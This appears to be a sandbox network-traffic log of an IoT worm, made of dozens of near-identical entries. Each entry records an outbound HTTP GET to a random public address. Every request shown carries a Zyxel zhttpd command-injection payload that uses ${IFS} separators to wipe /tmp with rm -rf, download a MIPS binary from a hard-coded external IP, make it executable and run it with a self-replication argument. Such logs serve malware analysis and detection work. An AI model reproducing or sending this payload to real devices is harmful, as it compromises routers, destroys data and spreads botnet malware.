                                        Mar 31, 2024 09:21:59.381774902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6411192.168.2.233837017.150.48.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381803989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6412192.168.2.233974646.22.16.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381836891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6413192.168.2.2343118163.68.205.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381885052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6414192.168.2.2339822196.104.228.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381920099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6415192.168.2.235212868.98.50.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381970882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6416192.168.2.2355668108.241.89.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382009029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6417192.168.2.234841090.177.216.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382045984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6418192.168.2.2343230217.162.119.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382081985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6419192.168.2.2337664219.44.242.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382127047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6420192.168.2.2349516218.175.199.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382153034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6421192.168.2.235008868.201.111.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382200956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6422192.168.2.2333108134.237.49.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382244110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6423192.168.2.23380485.63.13.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382287979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6424192.168.2.23481144.241.71.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382330894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6425192.168.2.2358976106.46.106.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382373095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6426192.168.2.2339642105.170.248.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382409096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6427192.168.2.2351246120.185.181.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382476091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6428192.168.2.2344590211.195.63.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382505894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6429192.168.2.234615891.17.106.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382535934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6430192.168.2.2333402166.55.239.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382569075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6431192.168.2.2337920132.159.55.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382599115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6432192.168.2.2358390199.53.62.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382649899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6433192.168.2.2353798217.183.34.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382710934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6434192.168.2.235162875.242.231.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382747889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6435192.168.2.2342754165.72.29.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382791996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6436192.168.2.2348596109.102.45.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382852077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6437192.168.2.233881698.164.229.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382879972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6438192.168.2.2334906178.189.119.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382926941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6439192.168.2.235276289.168.71.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382966042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6440192.168.2.234066873.213.84.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.382998943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6441192.168.2.235618070.157.138.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383049965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6442192.168.2.2352384193.82.56.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383080006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6443192.168.2.2344320130.76.96.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383120060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6444192.168.2.233728491.84.73.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383171082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6445192.168.2.2352140150.58.160.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383203983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6446192.168.2.2338790208.138.27.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383249044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6447192.168.2.233893478.21.178.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383289099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6448192.168.2.2335114216.200.154.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383341074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6449192.168.2.2359158162.247.159.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383375883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6450192.168.2.233695047.204.16.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383413076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6451192.168.2.235790460.250.29.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383447886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6452192.168.2.235280279.134.51.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383496046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6453192.168.2.2333564164.6.42.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383527040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6454192.168.2.2342586180.24.84.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383579969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6455192.168.2.235561435.209.204.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383629084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6456192.168.2.2357326124.40.238.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383676052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6457192.168.2.2355766142.88.145.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383709908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6458192.168.2.235085423.2.154.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383765936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6459192.168.2.235628072.45.127.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383800983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6460192.168.2.2359394107.190.197.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383836031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6461192.168.2.2347412161.109.10.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383866072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6462192.168.2.2337770105.227.126.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383907080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6463192.168.2.233753837.43.171.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383948088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6464192.168.2.2340518126.201.212.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.383980036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6465192.168.2.2335902191.235.251.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384015083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6466192.168.2.2340344112.197.187.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384058952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6467192.168.2.2337674221.174.14.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384103060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6468192.168.2.2359598171.67.61.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384155035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6469192.168.2.2342064179.115.22.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384191990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6470192.168.2.2359132120.123.180.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384237051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6471192.168.2.233927053.19.74.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384277105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6472192.168.2.2346120105.79.22.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384331942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6473192.168.2.2358508121.228.126.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384368896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6474192.168.2.233535267.253.85.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384397984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6475192.168.2.2354236132.209.157.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384444952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6476192.168.2.2360788187.29.75.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384479046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6477192.168.2.2360360148.4.136.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384514093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6478192.168.2.234654881.53.76.44443
                                        TimestampBytes transferredDirectionData
